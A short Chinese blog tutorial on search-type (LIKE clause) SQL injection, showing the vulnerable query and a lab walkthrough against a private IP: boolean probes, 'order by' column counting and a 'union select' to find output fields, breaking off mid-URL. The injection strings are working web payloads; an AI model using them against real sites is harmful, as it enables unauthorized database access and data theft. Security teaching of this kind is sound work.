基本介绍
网站为了用户便于搜索网站中的资源往往会加入搜索功能,如果底层的代码忽略了对搜索变量的过滤,则有可能会造成了搜索型注入漏洞(又称文本框注入),对于常见的搜索框而言,后台常用的SQL语句如下所示,在这里参数如果未经过滤直接拼接到SQL语句中则存在注入,注入方法类似于字符型注入,不过在这里我们需要闭合的符合就变成了"%",其余的基本上一致
select * from member where username like '%input%'
注入流程
确定注入
http://192.168.244.128/sql_search.php?content= #正常页面
http://192.168.244.128/sql_search.php?content=%' and 1=1 # #正常页面
http://192.168.244.128/sql_search.php?content=%' and 1=2 # #不正常显示
猜解字段
http://192.168.244.128/sql_search.php?content=%' order by 3 # #正常显示
http://192.168.244.128/sql_search.php?content=%' order by 4 # #不正常显示
确定回显位
http://192.168.244.128/sql_search.php?content=-1%' union select 1,2,3 #
查询库用户名
http://192.168.244
标签:search,php,http,刨析,192.168,content,漏洞,sql,101 From: https://blog.csdn.net/Fly_hps/article/details/139858987